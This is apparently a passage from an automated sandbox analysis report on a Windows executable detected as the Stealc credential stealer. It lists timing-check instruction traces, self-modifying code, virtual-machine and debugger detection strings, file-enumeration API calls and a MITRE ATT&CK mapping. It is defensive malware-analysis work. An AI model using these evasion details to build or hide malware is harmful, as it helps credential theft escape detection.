                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ED03B second address: 6ED04A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91A12E52FBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ED04A second address: 6ED056 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EBF7C second address: 6EBF86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F91A12E52F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EBF86 second address: 6EBFCC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F91A0D1A3E4h 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F91A0D1A3DCh 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 push edx 0x0000001a push edi 0x0000001b pop edi 0x0000001c pushad 0x0000001d popad 0x0000001e pop edx 0x0000001f jmp 00007F91A0D1A3DDh 0x00000024 push eax 0x00000025 push edx 0x00000026 push esi 0x00000027 pop esi 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EBFCC second address: 6EBFE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A12E5301h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EC11A second address: 6EC127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jne 00007F91A0D1A3D6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EC127 second address: 6EC12C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EC2C0 second address: 6EC2D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jng 00007F91A0D1A3D6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EC2D1 second address: 6EC2FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F91A12E5308h 0x00000010 jns 00007F91A12E52F6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EC2FA second address: 6EC30A instructions: 0x00000000 rdtsc 0x00000002 js 00007F91A0D1A3D6h 0x00000008 jne 00007F91A0D1A3D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F07DD second address: 6F0812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F91A12E5302h 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F91A12E5309h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6118E6 second address: 6118EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6118EA second address: 6118F0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6118F0 second address: 611909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F91A0D1A3DFh 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70094B second address: 700950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FBA23 second address: 6FBA2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70CF4D second address: 70CF51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70CF51 second address: 70CF55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71D761 second address: 71D76C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F91A12E52F6h 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71D76C second address: 71D771 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71D771 second address: 71D777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71D777 second address: 71D798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91A0D1A3DCh 0x00000009 popad 0x0000000a push ebx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop ebx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jc 00007F91A0D1A3FAh 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71D798 second address: 71D79E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71C786 second address: 71C78B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71C78B second address: 71C790 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71C790 second address: 71C796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71C8EB second address: 71C8EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71C8EF second address: 71C913 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0D1A3E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F91A0D1A3D8h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71D031 second address: 71D046 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F91A12E52FEh 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71D437 second address: 71D451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91A0D1A3E2h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71D451 second address: 71D46E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F91A12E5304h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72032B second address: 720340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F91A0D1A3D6h 0x0000000a jnp 00007F91A0D1A3D6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 720340 second address: 720369 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A12E5306h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F91A12E52FCh 0x0000000f je 00007F91A12E52F6h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 720369 second address: 720371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722CD7 second address: 722CDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7231A4 second address: 7231A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7231A8 second address: 7231F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 jmp 00007F91A12E5307h 0x0000000d nop 0x0000000e cld 0x0000000f push dword ptr [ebp+122D300Bh] 0x00000015 sub edx, dword ptr [ebp+122D3474h] 0x0000001b call 00007F91A12E52F9h 0x00000020 jmp 00007F91A12E52FDh 0x00000025 push eax 0x00000026 je 00007F91A12E5300h 0x0000002c pushad 0x0000002d push edi 0x0000002e pop edi 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7231F7 second address: 723217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 jmp 00007F91A0D1A3DCh 0x0000000e mov eax, dword ptr [eax] 0x00000010 push esi 0x00000011 jbe 00007F91A0D1A3DCh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 724A18 second address: 724A3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F91A12E5305h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F91A12E52F6h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 724A3D second address: 724A49 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F91A0D1A3D6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 724A49 second address: 724A4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7245F4 second address: 7245F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7245F8 second address: 7245FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7245FE second address: 724612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F91A0D1A3DEh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7266AE second address: 7266E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push esi 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jnp 00007F91A12E52F6h 0x00000011 pop esi 0x00000012 pushad 0x00000013 jne 00007F91A12E52F6h 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007F91A12E5305h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F70302 second address: 4F7037C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F91A0D1A3E7h 0x00000009 sbb al, FFFFFFAEh 0x0000000c jmp 00007F91A0D1A3E9h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F91A0D1A3E0h 0x00000018 jmp 00007F91A0D1A3E5h 0x0000001d popfd 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 xchg eax, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov ax, dx 0x00000028 call 00007F91A0D1A3DFh 0x0000002d pop ecx 0x0000002e popad 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F70406 second address: 4F7047F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A12E5309h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F91A12E5301h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 call 00007F91A12E5303h 0x00000018 pop eax 0x00000019 pushfd 0x0000001a jmp 00007F91A12E5309h 0x0000001f xor ax, E436h 0x00000024 jmp 00007F91A12E5301h 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64BDC0 second address: 64BDC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64BF80 second address: 64BF84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 666589 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 491786 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 647DFB instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6C79C6 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_002438B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00244910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00244910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0023DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0023DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0023E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0023E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0023ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0023ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00244570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00244570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0023DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0023DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0023BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0023BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00243EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00243EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0023F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0023F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_002316D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00231160 GetSystemInfo,ExitProcess,0_2_00231160
                Source: file.exe, file.exe, 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2171047770.00000000010A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                Source: file.exe, 00000000.00000002.2171047770.00000000010A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2171047770.0000000001043000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.2171047770.0000000001078000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13637
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13659
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13640
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13691
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13651
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002345C0 VirtualProtect ?,00000004,00000100,000000000_2_002345C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00249860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00249860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00249750 mov eax, dword ptr fs:[00000030h]0_2_00249750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00247850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00247850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1656, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00249600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00249600
                Source: file.exeBinary or memory string: :Program Manager
                Source: file.exe, 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: :Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00247B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00246920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00246920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00247850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00247850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00247A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00247A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.230000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2171047770.0000000001043000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2129309705.0000000004DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1656, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.230000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2171047770.0000000001043000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2129309705.0000000004DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1656, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

